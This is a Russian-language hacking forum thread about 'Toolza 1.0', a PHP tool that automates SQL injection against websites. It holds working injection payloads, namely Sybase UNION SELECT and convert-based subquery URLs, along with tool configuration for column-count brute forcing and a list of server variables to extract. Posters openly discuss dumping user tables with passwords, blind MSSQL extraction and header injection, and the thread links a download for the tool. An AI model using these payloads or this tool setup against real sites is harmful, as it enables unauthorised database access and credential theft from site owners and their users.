Toolza 1.0

Discussion in 'PHP' started by Pashkela, 17 Oct 2009.

  1. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    update:

    - добавлен альтернативный метод получения содержимого страницы
    - в MySql разделе устранены баги в случаях, когда имена БД или таблиц содержали "-"
     
    1 person likes this.
  3. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    ну тулза меня поражает своей скоростью, но есть одинь баг. Когда работаеш черз name_const или floor rand бдинд то все норм сливает до того как возмеш всю структуру. Но когда придется дело до слива юзеров то сливает очень быстро(номер слива видно быстро изменяется) но результат выводится 1 от 10-30. Тоесть если слит 100 то из них выводится тока макс 10 и то мало.
    Попробовал изменит потом до 1 но все же, пришлось юзать готовый сорс с готовым запросом который изменяет тока номер лимита ((. Но скорость не айс
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    дай пример в личку, чото не очень вогнал, о чем ты.

    PS: Или пиши на инглише, может быть так будет внятней)
     
    #224 Pashkela, 16 Mar 2010
    Last edited: 16 Mar 2010
  5. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    отправил в личико
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Разобрался - что name_const, что floor(rand()) методы имеют ограничение по длине возвращаемых результатов, т.е. в принципе не особо предназначены для дампа данных сразу из кучи колонок, тем более с паролями. В скрипте идет concat() и т.д. приставки для того, чтобы данные вообще можно было как-то спарсить, так что то, что видно в браузере, не факт, что спарсится прогой. Выводы делайте сами.

    PS: Т.е. тулза работает корректно, однако на все есть "квантификаторы жадности" )
     
    #226 Pashkela, 16 Mar 2010
    Last edited: 17 Mar 2010
  7. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    ну спс и зато что поддерживаеш прогу, если есть ограничение по длине то эт можно обходит поставив готовый запрос на другой сорец, главное тулза просто отлично справляется со своим заданием, респект тебе. Если конечно возможно добав функцию блинд на mssql тоже. Я слил бд на мсскл по блинду но на другом софте. Хотелось бы чтоб тулза тоже поддерживал такую функцию
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Блинда для всех остальных типов БД в разработке.

    UPDATE:

    исправлены ошибки MSSQL inj
     
    #228 Pashkela, 17 Mar 2010
    Last edited: 19 Mar 2010
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    update:

    Sybase:

    1 . UNION SELECT method:

    Code:
    http://site.com/index.phtml?pid=7+union+select+null,@@version,null
    
    Настройки в скрипте:
    
    $s_union_select_url = "http://site.com/index.phtml?pid=7+union+select+null,^,null"; # url UNION+SELECT method
    $s_subquery_url = ""; # url SUBQUERY method
    $s_method = 0; # 0 - UNION+SELECT method, 1 - SUBQUERY method
    $s_filtr = "--"; # close SQL
    $s_plus = "+"; # %20,%2b & etc.
    $s_convert = "numeric"; # default type to convert - numeric (for subquery method)
    
    1 . SUBQUERY method:

    Code:
    http://site.com/index.phtml?pid=-7+or+1=convert(numeric,(select+@@version))--+
    
    Настройки в скрипте:
    
    $s_union_select_url = ""; # url UNION+SELECT method
    $s_subquery_url = "http://site.com/index.phtml?pid=-7+or+1="; # url SUBQUERY method
    $s_method = 1; # 0 - UNION+SELECT method, 1 - SUBQUERY method
    $s_filtr = "--+"; # close SQL
    $s_plus = "+"; # %20,%2b & etc.
    $s_convert = "numeric"; # default type to convert - numeric (for subquery method)
    
    + системные данные:
    Code:
    @@version
    user_name()
    @@boottime
    @@errorlog
    @@language
    @@servername
    db_name()
    
     
  10. Akula007

    Akula007 New Member

    Joined:
    23 Apr 2010
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Как сканировать определенный сайт?
     
  11. DavanG3

    DavanG3 New Member

    Joined:
    17 Apr 2010
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    Что случилось с видео я не вижу и не скачать?
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Видео случайно похерилось)) Теперь только на интуиции
     
  13. DavanG3

    DavanG3 New Member

    Joined:
    17 Apr 2010
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    Хм, которые могут загружать видео еще раз?
     
  14. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,177
    Likes Received:
    617
    Reputations:
    690
    Выкладываем то что есть (потом Пашкела сам сортирует)
    режим LFI/READER/Load_file() bruter - сжатый(3,12 Мб), распаковынный(120 Мб)

    Скачать
     
    _________________________
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Всё, нашел бекапы, уже перезаливаю, через час все будет на месте

    last version - http://bug-track.ru/prog/toolza1.0.zip

    All videos on the places
     
    #235 Pashkela, 29 Apr 2010
    Last edited: 29 Apr 2010
  16. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    pashkela бро тулза прекрасно справляется со своей задачей респект. Если сможеш добав функцию чтоб инжектил и на Header. Чтоб можно было свою дополнитую хедер добавит с инжектом. Много скули на хедере но тулза не поддерживает ((
     
  17. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    У меня вопрос по "MySQL injection column number bruter"
    Как указать скрипту что нужно в определенном параметре вставлять брут?
    например: www.pupkin.com/index.php?param1=тут уязвим параметр&param2=13
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ну если к примеру хотим получить чонить такое:

    www.pupkin.com/index.php?param1=1+union+select+1,2,3--+&param2=13

    то так:

    Code:
    $source_sql_c = "www.pupkin.com/index.php?param1=1";# url
    $filtr_c = "--+&param2=13"; # close SQL
    $plus_c = "+"; # /**/,%20,%2b & etc.
    $sql_mess = "Different number of columns";# Текст идентификатор правильного/неправильного запроса
    $sql_mess_type = 0;# Тип текста идентификатора, 1 - когда запрос правильный, 0 - когда запрос неправильный 
    
    т.е. просто "рубим" ссылку пополам в том месте, куда предполагаем вставлять "+union+select+1,2,3....."
     
  19. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    ну я просто поменяю местами параметры и поставлю в конец уязвимый параметр и всё ))

    при твоем условиии так
    www.pupkin.com/index.php?param2=13&param1=1+union+select+1,2,3--+

    пашет как на
    www.pupkin.com/index.php?param1=1+union+select+1,2,3--+&param2=13

    но удобно автоматизировать, так как если там много параметров по с примером пашкелы будет длинный коммент типа:
    $filtr_c = "--+&param2=13&param2=1543&param3=43&param5=545&param6=132342&param7=54&param8=13"; # close SQL
     
  20. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Спасибо за помощь ) да действительно, чет я не догадался что параметры можно местами поменять )
    Вот еще бы была реализация для лома через куки и хидер )